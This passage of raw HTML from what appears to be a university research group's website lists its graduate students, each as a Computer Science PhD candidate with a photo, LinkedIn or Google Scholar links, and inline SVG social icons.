23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.researchgate.net/profile/Faris-Hawamdeh\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c73\" id=\"grads\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-846 style-local-182-c73 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c146\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-860 style-local-182-c146 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-861-outer style-local-182-c147-outer\">\n            <div data-colibri-id=\"182-c147\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-861 style-local-182-c147 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c148\" class=\"h-global-transition-all h-heading style-862 style-local-182-c148 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-862 style-local-182-c148\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Graduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c74\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-847 style-local-182-c74 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c75-outer\">\n            <div data-colibri-id=\"182-c75\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c75 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c76\" class=\"d-block style-854 style-local-182-c76 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-cropped-cropped-282038166_2492815234187345_4129762528023780269_n-e1697205710763.jpg\" class=\"wp-image-1742 style-854-image style-local-182-c76-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c76-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c77\" class=\"h-global-transition-all h-heading style-850 style-local-182-c77 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c77\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sundos Al Subhi</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c78\" class=\"h-text h-text-component style-851 style-local-182-c78 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c79\" class=\"h-text h-text-component style-902 style-local-182-c79 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c80\" class=\"style-855 style-local-182-c80 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sundos-al-subhi-88bb97150\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c81-outer\">\n            <div data-colibri-id=\"182-c81\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c81 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c82\" class=\"d-block style-849 style-local-182-c82 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-cropped-cropped-IMG_1240-scaled-1-e1697205818731.jpg\" class=\"wp-image-1744 style-849-image style-local-182-c82-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-849-frameImage style-local-182-c82-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c83\" class=\"h-global-transition-all h-heading style-850 style-local-182-c83 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c83\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Aaja Christie</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c84\" class=\"h-text h-text-component style-851 style-local-182-c84 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c85\" class=\"h-text h-text-component style-901 style-local-182-c85 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c86\" class=\"style-853 style-local-182-c86 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/aaja-christie-17573657/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c87-outer\">\n            <div data-colibri-id=\"182-c87\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c87 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c88\" class=\"d-block style-856 style-local-182-c88 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-cropped-Emma-e1697205932363.jpg\" class=\"wp-image-1745 style-856-image style-local-182-c88-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-856-frameImage style-local-182-c88-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c89\" class=\"h-global-transition-all h-heading style-850 style-local-182-c89 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c89\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Emma McDaniel</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c90\" class=\"h-text h-text-component style-851 style-local-182-c90 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>PhD Candidate\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c91\" class=\"h-text h-text-component style-852 style-local-182-c91 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c92\" class=\"style-857 style-local-182-c92 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/emmamcdaniel/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=Cwt8OwkAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c93-outer\">\n            <div data-colibri-id=\"182-c93\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c93 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c94\" class=\"d-block style-854 style-local-182-c94 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-cropped-sara-edwards1-e1697206932891.jpg\" class=\"wp-image-1754 style-854-image style-local-182-c94-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md 